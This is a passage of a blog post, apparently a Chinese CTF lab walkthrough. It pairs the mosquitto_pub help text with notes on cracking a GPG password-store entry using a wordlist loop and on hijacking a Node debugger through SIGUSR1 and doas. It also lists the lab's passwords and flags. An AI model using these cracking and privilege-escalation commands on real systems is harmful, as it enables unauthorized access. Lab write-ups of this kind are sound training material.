mosquitto_pub version 2.0.11 running on libmosquitto 2.0.11.
Usage: mosquitto_pub {[-h host] [--unix path] [-p port] [-u username] [-P password] -t topic | -L URL}
{-f file | -l | -n | -m message}
[-c] [-k keepalive] [-q qos] [-r] [--repeat N] [--repeat-delay time] [-x session-expiry]
[-A bind_address] [--nodelay]
[-i id] [-I id_prefix]
[-d] [--quiet]
[-M max_inflight]
[-u username [-P password]]
[--will-topic [--will-payload payload] [--will-qos qos] [--will-retain]]
[{--cafile file | --capath dir} [--cert file] [--key file]
[--ciphers ciphers] [--insecure]
[--tls-alpn protocol]
[--tls-engine engine] [--keyform keyform] [--tls-engine-kpass-sha1]]
[--tls-use-os-certs]
[--psk hex-key --psk-identity identity [--ciphers ciphers]]
[--proxy socks-url]
[--property command identifier value]
[-D command identifier value]
mosquitto_pub --help
-A : bind the outgoing socket to this host/ip address. Use to control which interface
the client communicates over.
-d : enable debug messages.
-c : disable clean session/enable persistent client mode
When this argument is used, the broker will be instructed not to clean existing sessions
for the same client id when the client connects, and sessions will never expire when the
client disconnects. MQTT v5 clients can change their session expiry interval with the -x
argument.
-D : Define MQTT v5 properties. See the documentation for more details.
-f : send the contents of a file as the message.
-h : mqtt host to connect to. Defaults to localhost.
-i : id to use for this client. Defaults to mosquitto_pub_ appended with the process id.
-I : define the client id as id_prefix appended with the process id. Useful for when the
broker is using the clientid_prefixes option.
-k : keep alive in seconds for this client. Defaults to 60.
-L : specify user, password, hostname, port and topic as a URL in the form:
mqtt(s)://[username[:password]@]host[:port]/topic
-l : read messages from stdin, sending a separate message for each line.
-m : message payload to send.
-M : the maximum inflight messages for QoS 1/2..
-n : send a null (zero length) message.
-p : network port to connect to. Defaults to 1883 for plain MQTT and 8883 for MQTT over TLS.
-P : provide a password
-q : quality of service level to use for all messages. Defaults to 0.
-r : message should be retained.
-s : read message from stdin, sending the entire input as a message.
-t : mqtt topic to publish to.
-u : provide a username
-V : specify the version of the MQTT protocol to use when connecting.
Can be mqttv5, mqttv311 or mqttv31. Defaults to mqttv311.
-x : Set the session-expiry-interval property on the CONNECT packet. Applies to MQTT v5
clients only. Set to 0-4294967294 to specify the session will expire in that many
seconds after the client disconnects, or use -1, 4294967295, or ∞ for a session
that does not expire. Defaults to -1 if -c is also given, or 0 if -c not given.
--help : display this message.
--nodelay : disable Nagle's algorithm, to reduce socket sending latency at the possible
expense of more packets being sent.
--quiet : don't print error messages.
--repeat : if publish mode is -f, -m, or -s, then repeat the publish N times.
--repeat-delay : if using --repeat, wait time seconds between publishes. Defaults to 0.
--unix : connect to a broker through a unix domain socket instead of a TCP socket,
e.g. /tmp/mosquitto.sock
--will-payload : payload for the client Will, which is sent by the broker in case of
unexpected disconnection. If not given and will-topic is set, a zero
length message will be sent.
--will-qos : QoS level for the client Will.
--will-retain : if given, make the client Will retained.
--will-topic : the topic on which to publish the client Will.
--cafile : path to a file containing trusted CA certificates to enable encrypted
communication.
--capath : path to a directory containing trusted CA certificates to enable encrypted
communication.
--cert : client certificate for authentication, if required by server.
--key : client private key for authentication, if required by server.
--keyform : keyfile type, can be either "pem" or "engine".
--ciphers : openssl compatible list of TLS ciphers to support.
--tls-version : TLS protocol version, can be one of tlsv1.3 tlsv1.2 or tlsv1.1.
Defaults to tlsv1.2 if available.
--insecure : do not check that the server certificate hostname matches the remote
hostname. Using this option means that you cannot be sure that the
remote host is the server you wish to connect to and so is insecure.
Do not use this option in a production environment.
--tls-engine : If set, enables the use of a TLS engine device.
--tls-engine-kpass-sha1 : SHA1 of the key password to be used with the selected SSL engine.
--tls-use-os-certs : Load and trust OS provided CA certificates.
--psk : pre-shared-key in hexadecimal (no leading 0x) to enable TLS-PSK mode.
--psk-identity : client identity string for TLS-PSK mode.
--proxy : SOCKS5 proxy URL of the form:
socks5h://[username[:password]@]hostname[:port]
Only "none" and "username" authentication is supported.
See https://mosquitto.org/ for more information.
奥还是mqtt,发送信息任务,那我懂了具体就发给刚刚的用户就好了
又是这个那我知道为啥没有id_rsa
要密码不知道能不能爆破出来
看wp的方向是这个并且在local/share里面
服气真不看wp根本进行不下去,算了我觉得都看怎么多地方了也不差最后一点的wp了,这个靶机非常牛逼,不亏是hard
1
2
3
4
for i in $(cat lover.txt);do echo $i| gpg --batch --passphrase-fd 0 --pinentry-mode loopback --decrypt .password-store/work/office.gpg &>/dev/null; [[ $? == 0 ]] && echo "[+]$i" && break ;done
[+]loverboy1
grep -Pr '^love[^ ]*[^0-9][0-9]$' /usr/share/wordlists/rockyou.txt > lover.txt
问就是我太菜了只能拿别人的方案
密码有: d1NpIh1bCKMx CzMO48xpwof8nvQ6JUhF qiFQI7buDp7zIQnAymEY
都没对是什么东西?
需要对照这个做,目前发现kill的输入密码好像是lenam这个用户,确实密码为:qiFQI7buDp7zIQnAymEY
看进程的是用node这个
是变化的所以利用配对进行过滤,按第一个来
是这个利用方案么,我先试试看
这个才是地址为:https://nodejs.cn/api/process/process_kill_pid_signal.html 地址:https://nodejs.org/en/learn/getting-started/debugging
1
uid=$(ps -ef|grep node|head -1 |awk -F ' ' '{print $2}');doas -u julian /bin/kill -s SIGUSR1 $uid && /home/julian/.nvm/versions/node/v22.7.0/bin/node inspect 127.0.0.1:9229
之前debug被干掉了
My password: tk8QaHUi3XaMLYoP1BpZ
最后一个了快结束了
利用这个数据库干什么东西,不过有一个异或的东西,看wp利用动态调试,不过呢很明显我不会我顶多debug爆炸,所以我直接tools解一下,非常好没爆破出xor,看wp的方案
理解一下首先会做的事情就是解压这个数据库的啥玩意后面会删除,我们现在是有环境变量的所以直接劫持rm,
终于结束了,真难啊
userflag:c25e7b68dd71d1ca9d8f86da2df12035
rootflag:44d981ce629f2077103ed9dc70d635f5
This post is licensed under CC BY 4.0 by the author.